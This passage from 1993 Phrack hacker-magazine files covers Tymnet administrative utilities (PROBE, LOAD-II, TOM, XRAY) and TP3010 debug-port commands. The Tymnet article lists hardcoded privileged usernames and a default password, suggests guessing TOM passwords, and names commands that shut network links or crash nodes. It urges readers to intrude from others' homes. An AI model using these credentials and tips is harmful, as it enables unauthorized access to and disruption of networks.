  3099. For more PROBE related TMCS commands or general TMCS commands, please
  3100. refer to an appropriate source.  If the demand is great enough, perhaps I
  3101. will release a TMCS reference sheet in the future.
  3102.  
  3103.    PROBE access is determined by the sum of the individual license
  3104. levels granted to the user.  PROBE licenses are as follows:
  3105.  
  3106. License    Description
  3107. -------    -----------
  3108.   00       Permits view only commands -- user is automatically logged off
  3109.            from PROBE after 20 minutes of no activity.
  3110.   04       Permits view only commands -- no automatic logoff.
  3111.   20       Permits all 00 commands plus ability to effect changes to
  3112.            network links.
  3113.   10       Permits ability to effect changes to node status.
  3114.   01       Permits ability to effect changes to network supervisors.
  3115.   02       Permits ability to effect changes to supervisor disks.
  3116.  
  3117.    I do not have any hardcoded usernames for PROBE with this exception.
  3118. The PROBE access username 'PROBE' is hardcoded into the supervisor,
  3119. and usually each host has one hardcoded PROBE username: CONTROL -- license
  3120. level 37.  So in comparison with the above chart, CONTROL has Gh0d access
  3121. to PROBE commands, because everything added up equals 37 (duh).  On many
  3122. subnets, the username RPROBE has similar access.
  3123.  
  3124. PROBE COMMANDS
  3125.  
  3126. Command      Lic. Lvl  Description
  3127. -------      --------  -----------
  3128. CHANGE        00/04    Changes your PROBE personal password.
  3129. EXI           00/04    Logout.
  3130. HELP          00/04    Help. (Temple of Sub-Genius)
  3131. SEND x text   00/04    Sends message to Probe user whose job label is 'x'.
  3132. VERSION       00/04    Lists current software version number.
  3133. WHO           00/04    Lists currently logged in PROBE users. (Useful)
  3134.  
  3135. DISPLAY CMDS:
  3136. Command     Lic. Lvl  Description
  3137. -------     --------  -----------
  3138. ACCT         00/04    Displays # of accounting blocks on Supervisor disk
  3139.                       available for RAM session record data.
  3140. AN           00/04    Displays detailed information about active nodes.
  3141. ASTAT        00/04    Displays number of login and circuit building
  3142.                       timeouts.
  3143.  
  3144. AU           00/04    Displays node numbers of ALL active nodes that are up.
  3145. CHAN x       00/04    Displays port number used by Supervisor for command
  3146.                       circuit to node 'x'.
  3147. COST x       00/04    Displays cost of building command circuit to node 'x'.
  3148. CSTAT        00/04    Displays time, login, rate, and network status every
  3149.                       15 seconds.
  3150. EXC O|S|P    00/04    Displays links that are overloaded (O), or shut (S),
  3151.                       or out of passthroughs (P).
  3152. HOST x       00/04    Displays information about host 'x' or all hosts.
  3153. LACCT        00/04    Displays number of last accounting block collected
  3154.                       by RAM session record data.
  3155. LRATE        00/04    Displays Supervisor login rate in logins per min.
  3156. LSHUT        00/04    Displays shut links table.
  3157. LSTMIN       00/04    Displays circuit status information gathered by
  3158.                       Supervisor during preceding minute.
  3159. N x          00/04    Displays status info about node 'x'.
  3160. OV x         00/04    Displays overloaded links.
  3161. PERDAT       00/04    Displays Supervisor performance data for preceding min.
  3162. RTIME        00/04    Reads 'Super Clock' time and displays year, and
  3163.                       Julian date/time.
  3164. STAT         00/04    Displays network status information.
  3165. SYS          00/04    Displays host number running PROBE.
  3166. TIME         00/04    Displays Julian date and network time.
  3167. TSTAT        00/04    Displays same information as STAT, preceded by
  3168.                       Julian date/time.
  3169. VERSION      00/04    Displays current versions of PROBE and Supervisor
  3170.                       software.
  3171. WHO          00/04    Displays active PROBE users and their job labels.
  3172.  
  3173. LOG MESSAGE CMDS:
  3174. Command          Lic. Lvl  Description
  3175. -------          --------  -----------
  3176. LOG               00/04    Outputs network information from Supervisor log.
  3177. REPORT            00/04    Controls output of node reports.
  3178. RLOG m1..m4       00/04    Restricts log output to up to four message numbers.
  3179.                            M1- 1st Message, M2- 2nd Message, etc.
  3180. RNODE n1 n2       00/04    Restricts log output to messages generated at nodes
  3181.                            N1 and N2.
  3182.  
  3183. NETWORK LINK CMDS:
  3184. Command         Lic. Lvl  Description
  3185. -------         --------  -----------
  3186. CSTREQ n1 n2       20     Requests total speed of all lines on specified
  3187.                           link. (n1= 1st Node n2= 2nd Node)
  3188. ESHUT n1 n2        20     Shuts specified link and enters it on shut links
  3189.                           table. (n1= 1st Node n2= 2nd Node)
  3190. PSTAT n Hhost p    20     For node 'n', displays status of logical ports
  3191.                           for port array 'p' on 'host'. Note the capital
  3192.                           'H' must precede the host specific.
  3193. RSHUT n1 n2        20     Opens specified link and removes it from shut
  3194.                           links table.
  3195. SYNPRT n           20     Displays status of async ports on node 'n'.
  3196. TRACE n Hhost p    20     Traces specified circuit. Where 'n' is node,
  3197.   or  n Sp         20     'host' is HOST, and 'p' is port.  Or for secondary
  3198.                           command: 'n' node name, 'p' port. Again, 'S' must
  3199.                           precede the port name.
  3200. T2BORI n1 n2       20     Resets communication channel between node n1 and
  3201.                           node n2.
  3202.  
  3203. NETWORK NODE CMDS:
  3204. Command  Lic. Lvl  Description
  3205. -------  --------  -----------
  3206. CLEAR n     10     Opens all links on node 'n'.
  3207. DLOAD n     10     Causes node 'n' to execute its downline load
  3208.                    bootstrap program.
  3209. NSHUT n     10     Shuts all links on node 'n'.
  3210. RETAKE n    10     Causes Supervisor to release and retake control
  3211.                    of node 'n'.
  3212. SPY         10     Displays last 32 executions of selected commands.
  3213.  
  3214. NETWORK SUPERVISOR CMDS:
  3215. Command  Lic. Lvl  Description
  3216. -------  --------  -----------
  3217. AWAKE       01     Wakes a sleeping Supervisor. (Only one Supervisor is
  3218.                    active at one time, however there can be supervisors
  3219.                    'sleeping'.)
  3220. CLASS       01     Causes Supervisor to read Netval class and group
  3221.                    definitions.
  3222. DF s        01     Increases Supervisor's drowsiness factor by 's' seconds.
  3223. ETIME       01     Sets time known to Supervisor.
  3224. FREEZE      01     Removes Supervisor from network.
  3225. PSWD        01     Displays password cipher in hex.
  3226. SLEEP       01     Puts active Supervisor to sleep.
  3227. THAW        01     Initializing frozen Supervisor.
  3228. TWAKE       01     Wakes sleeping Supervisor, automatically puts active
  3229.                    Supervisor to sleep and executes a CSTAT command.
  3230.  
  3231. USER UTILITY CMDS:
  3232. Command  Lic. Lvl  Description
  3233. -------  --------  -----------
  3234. ENTER       01     Adds/deletes/modifies Probe usernames.
  3235. HANG x      01     Logs off user with job label 'x'.
  3236. LIST        01     Displays Probe usernames.
  3237. ULOGA       20     Enters user-generated alphabetic message in msg log.
  3238. ULOGH       20     Enters user-generated hex message in msg log.
  3239.  
  3240. SYSTEM MAINTENANCE / DISASTER RECOVERY CMDS:
  3241. Command       Lic. Lvl  Description
  3242. -------       --------  -----------
  3243. DCENT n1 n2      02     Allows Tymnet support temporary, controlled access
  3244.                         to a private network. (Useful)
  3245. DCREAD           02     Reads current value of password cipher associated
  3246.                         with DCENT username.
  3247. FTIME +/- s      02     Corrects the 'Super Clock' by adding (+) or
  3248.                         subtracting (-) 's' seconds from it.
  3249. INITA            02     Initializes accounting file to all zeros.
  3250. INITL            02     Initializes log to all zeros.
  3251.  
  3252.  
  3253. NOTE:  Each PROBE is a separate entity with its own files.  For example,
  3254.        if you shut lines in the PROBE on the active Supervisor, this will
  3255.        NOT be known to the sleeping PROBE.  If another Supervisor takes
  3256.        over the network, it will not consider the link to be shut.
  3257.        Likewise, PROBE password changes are made only to one PROBE at a
  3258.        time.  To change your password everywhere, you must do a CHANGE in
  3259.        each probe.
  3260.  
  3261. LOAD-II
  3262. -------
  3263.  
  3264.    LOAD-II is probably one of the LEAST known of Tymnet's utilities.
  3265. LOAD-II is used to load or dump a binary image of executable code for a
  3266. node or slot.  The load/dump operation can be used for the ENTIRE engine,
  3267. or a specific slot.
  3268.  
  3269. Upon reaching the command prompt you should enter:
  3270.  
  3271.    R LOADII <cr>
  3272.  
  3273. This will initiate an interactive session between you and the LOAD-II
  3274. load/dumping process.  The system will go through the following procedure:
  3275.  
  3276. TYMNET OUTPUT         YOUR INPUT  WHAT THIS MEANS TO YOU
  3277. -------------         ----------  ----------------------
  3278.  
  3279. Enter Function:           G       'G' Simply means identify a gateway
  3280. Enter Gateway Host:     ####      This is the 4 digit identifier for hosts
  3281.                                   on the network.  I know that 2999 is for
  3282.                                   'MIAMI'.
  3283. Password:               LOAD      This is the default password for LOAD-II.
  3284. Function:                 C       'C' for crash table dump, OR
  3285.                           D       'D' to dump an entire engines contents, OR
  3286.                           L       'L' to load an entire engines contents, OR
  3287.                           S       'S' to load a slot, or
  3288.                           U       'U' to dump a slot.
  3289. Neighbor Node:          ####      Selects neighbor node number.
  3290. Neigh. Kern. Host#:     ###       This 3-digit code is derived by adding the
  3291.                                   first two digits of the node number and
  3292.                                   appending the last two digits to that sum.
  3293. Line # to Load From:    ##        Use the line number coming off the
  3294.                                   neighbor node, NOT the node that is DOWN.
  3295. Object File Name:                 File used to load/dump node or slot from/to.
  3296. EXIT                    EXI       Send program to end of job.
  3297.  
  3298.  
  3299. TOM - TYMCOM Operations Manager
  3300. -------------------------------
  3301.  
  3302.    TOM is utility which runs under TYMCOM.  Quickly, TYMCOM is an interface
  3303. program for the host computer which imitates multiple terminals.  Quoting
  3304. from Tymnet, "TYMCOM has multiple async lines running to the
  3305. front-end processor of the host."  So in other words, TYMCOM has a
  3306. bunch of lines tied into the engine's front-end, allowing a boatload of
  3307. jobs/users to access it.
  3308.  
  3309.    TOM is primarily used with TYMCOM dialup ports.  It is used to DOWN and
  3310. then UP hung ports.  This type of situation may occur after a host crash
  3311. where users are getting a 'Host Not Available' error message.  TOM can also
  3312. be used to put messages on TYMCOM in order to alert users to problems or
  3313. when scheduled maintenance will occur on various hosts/ports.  To login
  3314. type:
  3315.  
  3316.    ##TOM##:xxxx
  3317.  
  3318. Where 'xxxx' is the appropriate host number you wish to 'work' on. After
  3319. proper hostname is given, you will then be prompted for a password.  As I
  3320. have none of these to give, play on 3-5 character combinations of the
  3321. words: TYMCOM, TOM, HIF, OPMNGR.
  3322.  
  3323. Command         Description
  3324. -------         -----------
  3325. GRAB TOMxxxx    This should be the FIRST thing you do when down/upping
  3326.                 a host.  Gets license for up or down host, then prompts for
  3327.                 password of host.  Where 'xxxx' is the host number.  You
  3328.                 must have privileged status to use.
  3329.  
  3330. CHANGE xxxx     Change a host number to 'xxxx'.
  3331.  
  3332. DIAGNOSTICS     Turns the diagnostic messages off or on.(Toggle)
  3333. DOWN P xx       Take DOWN port number 'xx', or
  3334.      H xxxx     Take DOWN host number 'xxxx'.
  3335.  
  3336. ENQUIRE         Lists information about the node and slow where TYMCOM is
  3337.                 running.
  3338. EXIT            Logout.
  3339.  
  3340. MESSAGE         Sets text to be output to the terminal when a user logs in.
  3341.  
  3342. SHUT H xxxx     Disallow new logins to a specified host = 'xxxx', or
  3343.      P xx       Disallow new logins to a specified port = 'xx'.
  3344. SPEED xxxx      Specifies the baud rate at which a port will communicate.
  3345. STAT P xx-yy    Shows status of port numbers 'xx' through 'yy'.  Either
  3346.                 one or a number of ports may be specified.
  3347.  
  3348. TIME            Displays the current time.
  3349. TO x message    Sends 'message' to specified user number 'x'.
  3350.  
  3351. UP P xx         Bring UP port number 'xx', or
  3352.    H xxxx       Bring UP host number 'xxxx'.
  3353.  
  3354. WHO             Lists user numbers of all users currently logged into TOM.
  3355.  
  3356.  
  3357. XRAY
  3358. ----
  3359.  
  3360.    XRAY is another one of the very well known commands.  XRAY is a program
  3361. which sits within node code and waits for use.  Its used to gain
  3362. information about a specific node's configuration and its current status in
  3363. the network.  It can be used to determine the probable reason for a crash
  3364. or line outage in order to isolate bottlenecks or track down network
  3365. anomalies.
  3366.  
  3367.    XRAY user licenses are all assigned a logon priority.  If every XRAY
  3368. port on a node are in use, and a higher priority XRAY username logs in,
  3369. the lowest priority username will be logged out.
  3370.  
  3371. License Description
  3372. ------- -----------
  3373. 2       Permits the writing and running of disruptive node tests.
  3374. 1       Permits the running of non-disruptive node tests.
  3375. 0       Permits view only commands.
  3376.  
  3377.    The following list is a compilation of some hardcoded 'good-guys'.
  3378.  
  3379. LICENSE LEVEL  PRIORITY  GOOD GUY USERNAME  ACTIVE/PASSIVE  NETWORK IMPACT
  3380. =============  ========  =================  ==============  ==============
  3381.      2            98        XMNGR              Active           MAJOR
  3382.      2            98        ISISTECX           Active           MAJOR
  3383.  
  3384.      2            97        XNSSC              Active           MAJOR
  3385.  
  3386.      1            50        TNSCMX             Active           Minor
  3387.      1            50        TNSUKMX            Active           Minor
  3388.  
  3389.      1            40        XSOFT              Active           Minor
  3390.      1            40        XEXP               Active           Minor
  3391.      1            40        XCOMM              Active           Minor
  3392.      1            40        XSERV1             Active           Minor
  3393.  
  3394.      0            50        XRTECH            Passive
  3395.  
  3396.      0            30        XTECH             Passive
  3397.      0            30        XOPPS             Passive
  3398.      0            30        XSERV             Passive
  3399.      0             0        XRAY              Passive
  3400.  
  3401.    What follows is a VERY brief command summary.
  3402.  
  3403. Command         Description
  3404. -------         -----------
  3405. CD              Displays current auto/display mode for CRYPTO messages.
  3406. CD Y|N          Turns ON/OFF automatic display of CRYPTO messages.
  3407. CL n            Display the last 'n' CRYPTO messages.
  3408. CRTL Z          Logout.
  3409.  
  3410. BT              Causes the SOLO machine to go into boot.  Audited command.
  3411.  
  3412. DB              Used to build and measure link delay circuits between
  3413.                 nodes.  The DB command prompts for a node list. IE-
  3414.                 NODE LIST: <node #1 node#2 ... node#x>
  3415. DD              Displays link measurement data for circuit built by the
  3416.                 DB command.  Verifies that the circuit has been built.
  3417. DE              Used to terminate the DB command.
  3418.  
  3419. HT              Puts the node code into a STOP state.  This command shows
  3420.                 up in audit logs.
  3421.  
  3422. KD n            Display link descriptor parameters where 'n' is the
  3423.                 neighbor number.
  3424. KS n            Display link performance statistics (link delay, packet-
  3425.                 making, bandwidth utilization, etc.)
  3426.  
  3427. ND              Displays information about the configuration of a node
  3428.                 and its neighbors.
  3429. NS option       Displays parameters for estimating node work load. Options:
  3430.                 -EXCT is the current load factor or execute count. A count
  3431.                 of less than 60 means the load is heavy.
  3432.                 -EXLW is the lowest EXCT value computed since startup.
  3433.                 -EXHW is the highest EXCT value computed.
  3434. SN              Restarts the node, command audited.
  3435. ------------------------------------------------------------------------------
  3436.  
  3437.    I hope this file gave you a better understanding of the Tymnet network.
  3438. While a lot of the commands make sense only if you've had prior Tymnet
  3439. experience, I hope my summaries of each tool gave you a little better
  3440. understanding of the network.  I am available for questions/comments/gripes
  3441. on IRC, or I can be reached via Internet mail at:
  3442.  
  3443.                     pfalken@mindvox.phantom.com
  3444.  
  3445.    Thanks goes out to an anonymous hippy for providing the extra nudge I needed
  3446. to sit down and write this phile.  NO thanks goes out to my lousy ex-roommates
  3447. who kicked me out in the middle of this article.  Their day is approaching.
  3448.  
  3449.    Be careful everyone...and remember, if you have to explore the
  3450. mysterious fone/computer networks, do it from someone else's house.
  3451.  
  3452. - Professor Falken
  3453. = Legion of Doom!
  3454.  
  3455.  
  3456. <EOF-93> [Written with consent and cooperation of the Greys]
  3457.  
  3458.  
  3459.  
  3460.  
  3461. Date:     Wed Mar 24, 1993  4:50 am  PST
  3462. From:     phrack
  3463.           EMS: INTERNET / MCI ID: 376-5414
  3464.           MBX: phrack@stormking.com
  3465.  
  3466. TO:       Thomas J. Klotzbach / MCI ID: 375-1365
  3467. TO:       Proctor & Associates / MCI ID: 399-1080
  3468. TO:       Peter Nesbitt / MCI ID: 511-1312
  3469. TO:     * Berton Corson / MCI ID: 528-0397
  3470. TO:       Michael W. Carroll / MCI ID: 557-1860
  3471. TO:       Michael McMahon / MCI ID: 585-7625
  3472. TO:       Multiple recipients of list
  3473.           EMS: INTERNET / MCI ID: 376-5414
  3474.           MBX: phrack@stormking.com
  3475. Subject:  Phrack 42/7-14
  3476.  
  3477.                          ==Phrack Magazine==
  3478.  
  3479.              Volume Four, Issue Forty-Two, File 7 of 14
  3480.  
  3481.              USEFUL COMMANDS FOR THE TP3010 DEBUG PORT
  3482.  
  3483.                              BY G. TENET
  3484.  
  3485.  
  3486.     ALL OF THE COMMANDS LISTED BELOW, INDICATE A LENGTH IN ALL THE READ
  3487. COMMANDS. THE LENGTH OF THE READ COMMANDS MAY VARY DUE TO
  3488. CONFIGURATION OPTIONS AND SOFTWARE VERSION.
  3489.  
  3490. 1)  L7FE,L,A,R200
  3491.  
  3492.     THIS COMMAND STRING WILL LOAD '7FE' INTO THE MEMORY POINTER
  3493. REGISTER THEN LOAD THE CONTENT OF '7FE' AND '7FF' INTO THE MEMORY
  3494. POINTER REGISTER. THE 'A' THEN INCREMENTS THE CONTENTS OF THE MEMORY
  3495. POINTER REGISTER.  THE 'R200' COMMAND THEN READS 200 BYTES BEGINNING
  3496. AT THE LOCATION SPECIFIED BY THE MEMORY POINTER REGISTER.
  3497.     THIS AREA IS USED FOR STORING THE LOADED CONFIGURATION. DUE TO THE
  3498. VARIABLE NATURE OF THE CONFIGURATION RECORDS, THE READ COMMAND MAY HAVE
  3499. TO BE MODIFIED DEPENDANT ON THE NUMBER OF LINES DEFINED, THE TYPE OF LINES
  3500. DEFINED (X780,3270) AND THE TYPE OF SOFTWARE LOADED (4.2X OR 5.0X).
  3501.  
  3502.  
  3503. 2)  LC4,R3,LCC,R3  (4.2X SOFTWARE)
  3504.     L124,R3,L131,R3  (5.0X SOFTWARE)
  3505.  
  3506.     THIS COMMAND STRING WILL DISPLAY THE BUFFER MANAGER CONTROL BLOCK AREA
  3507. WHICH HAS BUFFER COUNTS WHICH MAY SUGGEST POSSIBLE PROBLEMS.
  3508.  
  3509.  
  3510. 3)  L32C,R   (4.2X SOFTWARE)
  3511.     L29C,R   (5.0X SOFTWARE)
  3512.  
  3513.     THIS COMMAND STRING WILL DISPLAY THE NUMBER OF ACTIVE VC'S IN THE
  3514. TP3 AT THAT MOMENT.
  3515.  
  3516.     IF THIS COMMAND IS USED VIA THE LOCAL CONSOLE, THE VC COUNT WILL NOT
  3517. INCLUDE THE USER CONNECTION BECAUSE THERE WILL BE NO VC ON THE X.25 LINE
  3518. FOR THE LOCAL CONSOLE.
  3519.  
  3520. 4)  L70,R60
  3521.  
  3522.     THIS COMMAND STRING WILL DISPLAY THE LCB (LINE CONTROL BLOCK) POINTER
  3523. FOR THE CONFIGURED LINES.
  3524.  
  3525.     THE ORDER THAT THE LCB POINTERS ARE ENTERED ARE: CONSOLE LCB, X.25 LCB,
  3526. LINE 1, LINE 2, LINE 3...LINE27.  ANY ZERO ENTRY IS AN UNCONFIGURED
  3527. LINE EACH LINE ENTRY IS TWO BYTES LONG.
  3528.  
  3529.  
  3530. 5)  L300,L,R20    (4.2X SOFTWARE)
  3531.     L270,L,R20    (5.0X SOFTWARE)
  3532.  
  3533.     THIS COMMAND STRING WILL DISPLAY THE LCN VECTOR TABLE. THE ENTRIES ARE
  3534. FOR EACH ACTIVE LCN BEGINNING WITH LCN 0 THRU THE HIGHEST CONFIGURED
  3535. LCN. A 0000 ENTRY FOR AN LCN WILL INDICATE THAT THE LCN IS NOT ACTIVE.
  3536. A NON ZERO ENTRY WILL POINT TO THE DCB (DEVICE CONTROL BLOCK) OF THE
  3537. ASSOCIATED LINE/DEVICE.
  3538.  
  3539. 6)  L1F1,L,R20     (4.2X SOFTWARE ONLY)
  3540.  
  3541.     THIS COMMAND STRING WILL DISPLAY THE PROTOCOL ID TABLE FOR THE
  3542. CONFIGURED/SUPPORTED PROTOCOLS. THE FORMAT OF THE OUTPUT
  3543. IS:
  3544.           999999999999...
  3545.           --  ----
  3546.           ! -- !  ----
  3547.           ! !  !   !...............POINTER TO THE SERVER TABLE   *****
  3548.           ! !  !...................POINTER TO THE PROTOCOL SERVICE ROUTINE
  3549.           ! !......................PROTOCOL ID NUMBER
  3550.           !                          01 =ITI (RITI AND LITI)
  3551.           !                          4B =X780
  3552.           !                          47 =NAP 3270
  3553.           !                          09 =DEBUG
  3554.           !........................NUMBER OF ENTRIES IN THIS TABLE
  3555.  
  3556.  
  3557. 7)  L(ADDRESS OF THE SERVER TABLE),R20
  3558.  
  3559.     THE ADDRESS OF THE SERVER TABLE IS FOUND IN #6 (ABOVE)
  3560.   THIS COMMAND WILL DISPLAY THE SERVER TABLE IN THE FORMAT:
  3561.  
  3562.          99999999...
  3563.          --  ----
  3564.          ! -- !................ THIS IS THE ADDRESS OF THE FIRST FREE DCB
  3565.          ! !                     IN THE FREE DCB LIST. IF 0000 THEN THERE ARE
  3566.          ! !                     NO FREE DCB'S FOR THIS SERVER AND PROTOCOL.
  3567.          ! !.....................SERVER NUMBER
  3568.          !.......................NUMBER OF ENTRIES IN THIS TABLE
  3569.  
  3570.  
  3571.     THE POINTER IN THIS TABLE , IF PRESENT, WILL POINT TO THE NEXT AVAILABLE
  3572. DCB.  WITHIN THE DCB, THERE IS A POINTER AT DISPLACEMENT 18 AND 19 WHICH
  3573. WILL POINT TO THE NEXT FREE DCB. THE LAST FREE DCB WILL HAVE A
  3574. POINTER OF 0000.
  3575.  
  3576.     THE FOLLOWING COMMANDS ARE USED WITHIN THE TP3 DEBUG PORT TO
  3577. PERFORM THE INDICATED ACTIONS.  ONLY THE TP3325 WILL SUPPORT THE
  3578. [# LPU NUMBER] OPTIONS.  THE USE OF THE [# LPU NUMBER] OPTION IS ONLY
  3579. REQUIRED IF YOU WISH TO ADDRESS A DIFFERENT LPU NUMBER; EXCEPT FOR THE
  3580. 'S' COMMAND WITH WHICH THE LPU MUST BE DEFINED.
  3581.  
  3582.      A SPACE CHARACTER MAY BE INCLUDED IN THE COMMAND AND THE COMMANDS
  3583. MAY BE STACKED (EXAMPLE:  L7FE ,L,A,R5,L#2,L 7FE,L,A,R5,L#3 7FE,L,A,R 5).
  3584.  
  3585.     THE TP3325 COMMANDS THAT DO NOT USE THE 'LPU' PARAMETER USE THE
  3586. LAST ASSIGNED LPU NUMBER.  (EXAMPLE:  L#27FE,R2,L#17FE,R4)
  3587. THE  FIRST LOAD COMMAND ADDRESSES LPU 2 AND THE NEXT LOAD COMMAND ADDRESSES
  3588. LPU 1.  THE READ OF TWO BYTES IS READING FROM LPU 2 AND THE READ OF FOUR
  3589. BYTES IS READING FROM LPU 1.
  3590.  
  3591.                 A VALUE
  3592.                       INCREMENTS THE MEMORY ADDRESS POINTER.
  3593.                       (EXAMPLE:  A5 OR AFFE2 OR A#2EF)
  3594.  
  3595.                 B VALUE
  3596.                       USED TO ENTER OR EXIT BINARY MODE.
  3597.                       (EXAMPLE:  B01 OR B00)
  3598.  
  3599.                 C [# LPU NUMBER] VALUE
  3600.                       USED TO WARM OR COLD START A TP3325 LPU
  3601.                            (EXAMPLE:  C00 OR C#300)
  3602.                                   OR
  3603.                       USED TO WARM OR COLD START OTHER TP3.
  3604.                            (EXAMPLE:  C01 OR C#201)
  3605.  
  3606.                 D VALUE
  3607.                       USED TO DECREMENT THE MEMORY POINTER.
  3608.                       (EXAMPLE:  D18 OR DFFE5 OR D#4IFF)
  3609.  
  3610.                 E STRING
  3611.                       USED TO CHECK FOR A EQUAL COMPARE OF MEMORY DATA.
  3612.                       (EXAMPLE:  E00 OR E0F0304 OR E#20000)
  3613.  
  3614.                 F STRING
  3615.                        USED TO FIND THE FIRST OCCURRENCE OF A STRING.
  3616.                        (EXAMPLE:  F0F0304 OR F08080202 OR F#308080404)
  3617.  
  3618.                 G [# LPU NUMBER] VALUE
  3619.                       USED  TO  FIND THE ADDRESS OF A CONFIGURATION FILE IN
  3620.                       MEMORY.  THE LPU DEFINITION IN THE COMMAND DOES
  3621.                       NOT CHANGE THE LPU ASSIGNMENT IN THE DEBUG PORT.
  3622.                       (EXAMPLE:  GFE OR G01 OR G#301)
  3623.  
  3624.                 I [# LPU NUMBER]
  3625.                       USED TO OBTAIN A LIST OF THE CONFIGURED LINE TYPES.
  3626.                       (EXAMPLE: I OR I#3)
  3627.  
  3628.                 K [# LPU NUMBER] [14 DIGIT ADDRESS]
  3629.                       USED  TO  OBTAIN  THE LCB, ADDRESS TABLE POINTERS AND
  3630.                       LINE NUMBER ASSOCIATED WITH THE ADDRESS.
  3631.                       (EXAMPLE:  K31102120012301 OR K#2 311021250212)
  3632.  
  3633.                 N STRING
  3634.                       USED TO CHECK FOR AN NON EQUAL COMPARISON.
  3635.                       (EXAMPLE:  N0F0304 OR N08080202 OR N#1 0F)
  3636.  
  3637.                 P [# LPU NUMBER] PORT NUMBER
  3638.                       USED TO READ THE CONTENTS OF A SPECIFIC PORT REGISTER.
  3639.                       (EXAMPLE:  P45 OR P21 OR P#4 21)
  3640.  
  3641.                 R VALUE
  3642.                       USED TO READ MEMORY DATA. THE QUANTITY IS INDICATED
  3643.                       BY THE 'VALUE'.
  3644.                       (EXAMPLE:  R18 OR R200)
  3645.  
  3646.                 S [# LPU NUMBER] LINE NUMBER
  3647.                       USED TO OBTAIN DATA SET SIGNALS FOR THE DEFINED LINE
  3648.                       NUMBER.
  3649.                       (EXAMPLE:  S1 OR S#23 OR S)
  3650.  
  3651.                 T     (TP3325 ONLY)
  3652.  
  3653.                 W STRING
  3654.                       USED TO WRITE DATA INTO MEMORY.
  3655.                       (EXAMPLE:  W0E0304 OR W08080707)
  3656.  
  3657.                 X [# LPU NUMBER]
  3658.                       USED TO DISPLAY THE DIFFERENCE BETWEEN THE STORED
  3659.                       CHECKSUM AND A CALCULATED CHECK SUM OF THE
  3660.                       OPERATING SOFTWARE.  THE LPU DEFINITION DOES
  3661.                       NOT CHANGE THE LPU ASSIGNMENT IN THE DEBUG PORT.
  3662.                       (EXAMPLE:  X OR X#2)
  3663.  
  3664.                 Y     (TP3325 ONLY)
  3665.                       RETURNS NCC LOAD ADDRESS FROM EPROM
  3666.  
  3667.                 Z     (TP3325 ONLY)
  3668.                       CRASHES APB AND XPB.  MAY HANG APB IF THE X.25
  3669.                       INTERFACE DOES NOT RESET.
  3670.  
  3671.                 $ PORT A  -- ENABLE AUTOCONNECT
  3672.                        M  -- DISABLE AUTOCONNECT
  3673.                        B  -- BUSY
  3674.                        R  -- RESET
  3675.                        C  -- CLEAR
  3676.  
  3677. HARDWARE COMMANDS FOR THE TP3000
  3678.  
  3679.     'P' COMMAND DISPLAYS THE STATUS OF A SPECIFIED PERIPHERAL INTERFACE
  3680. DEVICE FOR THE CPU. FOLLOWING IS A LIST OF SOME OF THE MORE USEFUL ADDRESSES
  3681. WHICH CAN BE BENEFICIAL IF TRYING TO RESEARCH A PROBLEM.
  3682. THIS COMMAND IS A READ TO THE SPECIFIED DEVICE.  DEPENDANT ON THE DEVICE
  3683. BEING READ (THE ADDRESS), THE TP MAY CRASH.
  3684.  
  3685.       COMMAND                               INTERPRETATION
  3686.       =======                               ==============
  3687.  
  3688.  TP3010
  3689.  ------
  3690.        P45                        READ CONSOLE READ REGISTER
  3691.                                     (BIT 2 THRU 6 SHOW THE POSITION OF
  3692.                                      THE FRONT PANEL ROTARY SWITCH)
  3693.                                     BIT 0 = NOT TIMEOUT STATUS (SEE P47)
  3694.                                     BIT 1 = NOT PBRST STATE (SEE P47)
  3695.                                     BIT 2 = NOT RESTART
  3696.                                     BIT 3 = NOT MEMORY SAVE
  3697.                                     BIT 4 = NOT TAPE LOAD
  3698.                                     BIT 5 = NOT PROGRAM SAVE
  3699.                                     BIT 6 = NOT DIAGNOSTICS
  3700.                                     BIT 7 = NOT SYSTEM GOOD
  3701.                                   IF BIT 6 THRU BIT 2 ARE ALL SET (EQUAL TO 1)
  3702.                                     THEN THE FRONT PANEL SWITCH IS IN
  3703.                                     THE X.25 LOAD POSITION.
  3704.        P47                        THIS COMMAND WILL CAUSE THE FRONT PANEL
  3705.                                      ALARM TO SOUND.
  3706.  
  3707.        P4D,P4D,P4D,P4D,P4D,P4D,P4D THE LAST RESPONSE WILL PROVIDE THE
  3708.                                      DOWN LINE LOAD EPROM REV. LEVEL
  3709.                                      FOR THE TP3010.
  3710.                                      EXAMPLE  43 = 'C' LEVEL
  3711.  TP3005
  3712.  ------
  3713.        P23                            BIT 1 = 0  CONFIG MODE
  3714.                                               1  RUN MODE
  3715.  
  3716.         4.2X        5.XX                        COMMENTS
  3717.        ======      ======        ===========================================
  3718.  
  3719.          70          70           LCB VECTOR TABLE
  3720.  
  3721.                                   2 BYTES FOR EACH LINE IN THE TP. IF LINE IS
  3722.                                   NOT DEFINED , THEN ENTRY IS 0000. IF LINE
  3723.                                   IS DEFINED, THEN ADDRESS POINTS TO THE
  3724.                                   LCB (LINE CONTROL BLOCK)
  3725.  
  3726.          C0          120          BM CONTROL BLOCK
  3727.          C4          124          # CONTROL BUFFERS INITIALIZED
  3728.          C5          125          # CONTROL BUFFERS FREE
  3729.          C6          126          LOWEST # CONTROL BUFFERS (00 IS NONE LEFT)
  3730.                      12B          POINTER TO THE CONTROL BUFFERS
  3731.          CC          131          # BLOCK BUFFERS INITIALIZED
  3732.          CD          132          # BLOCK BUFFERS FREE
  3733.          CE          133          LOWEST # BLOCK BUFFERS REACHED (00 IS NONE
  3734.                                      LEFT)
  3735.                      138          POINTER TO BLOCK BUFFERS
  3736.          1F1                      POINTER TO PROTOCOL ID TABLE
  3737.  
  3738.          270         1F0          X.25 LCB
  3739.          27E         27E             # FRAMES DISCARDED
  3740.          27F         27F             # CRC ERRORS
  3741.          280         280             # REJECTS SENT
  3742.          281         281             # REJECTS RECEIVED
  3743.          282         282             # T1 TIME OUTS
  3744.          283         283             # COMMAND REJECTS SENT
  3745.          284         284             # COMMAND REJECTS RECEIVED
  3746.          285         285             # DISCONNECTS SENT
  3747.          286         286             # DISCONNECTS RECEIVED
  3748.          287         287             # SET MODE SENT
  3749.          288         288             # SET MODE RECEIVED
  3750.          289         289             # FRAME OVERFLOW RECEIVED
  3751.          28A         28A             # I FRAMES SENT
  3752.          28B         28B             # I FRAMES RECEIVED
  3753.          2B0         230               DMA LCB
  3754.  
  3755.          300         270               LCN VECTOR TABLE
  3756.  
  3757.                      29B               MAX. # LCN'S
  3758.          32C         29C               # OF ACTIVE LCN'S
  3759.  
  3760.          7FE         7FE               POINTER TO THE END OF THE OPERATING
  3761.                                        SYSTEM. THE NEXT BYTE IS THE BEGINNING
